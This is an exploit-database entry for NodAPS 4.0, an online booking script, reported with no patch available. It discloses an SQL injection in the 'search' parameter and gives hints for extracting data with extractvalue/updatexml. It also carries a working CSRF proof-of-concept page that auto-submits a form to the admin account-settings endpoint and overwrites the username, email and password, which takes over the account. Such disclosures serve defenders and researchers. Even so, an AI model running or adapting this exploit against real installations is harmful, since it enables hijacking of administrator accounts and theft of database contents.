header-logo
Suggest Exploit
vendor:
Online Booking System - NodAPS
by:
Borna nematzadeh (L0RD)
8.8
CVSS
HIGH
SQL Injection/Cross-Site Request Forgery
352
CWE
Product Name: Online Booking System - NodAPS
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:online_booking_system_-_nodaps
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2018

Online Booking system – NodAPS 4.0 – ‘search’ SQL injection / Cross-Site Request Forgery

An issue was discovered in Online Booking system - NodAPS 4.0 script. With Cross-site request forgery (CSRF) vulnerability, attacker can hijack the authentication of users remotely. Put ' in the search parameter and you will have SQL syntax error. You can use 'extractvalue()' or 'updatexml()' functions to get data from database.

Mitigation:

Implement CSRF protection mechanisms such as synchronizer tokens, origin checks, and referrer checks.
Source

Exploit-DB raw data:

# Exploit Title:  Online Booking system - NodAPS 4.0 - 'search' SQL injection / Cross-Site Request Forgery
# Date: 2018-05-16
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/appointment-management-system-nodaps/16197805?s_rank=1535
# Version: 4.0
# Tested on: windows
================================================
# POC 1 : SQLi


# test : test.com/en/providers?search='
# Description: Put ' in the search parameter and you will have SQL syntax error.
You can use "extractvalue()" or "updatexml()" functions to get data from database.

================================================
# POC 2 : CSRF

# Description: An issue was discovered in Online Booking system - NodAPS 4.0 script.
With Cross-site request forgery (CSRF) vulnerability , attacker can hijack the authentication of users remotely.

================================================

# Exploit :

<html>
 <head>
     <title>CSRF POC</title>
 </head>
    <body>
    <form action="http://test.com/admin/accountSetting" method="POST">
      <input type="hidden" name="data&#91;username&#93;" value="testcsrf />
      <input type="hidden" name="data&#91;email&#93;" value="lord&#46;nematzadeh123&#64;gmail&#46;com" />
      <input type="hidden" name="data&#91;firstname&#93;" value="test2" />
      <input type="hidden" name="data&#91;lastname&#93;" value="test3" />
      <input type="hidden" name="data&#91;mobile&#93;" value="1000000000" />
      <input type="hidden" name="data&#91;website&#93;" value="" />
      <input type="hidden" name="data&#91;password&#93;" value="1234567890&#45;" />
      <input type="hidden" name="data&#91;language&#95;id&#93;" value="1" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR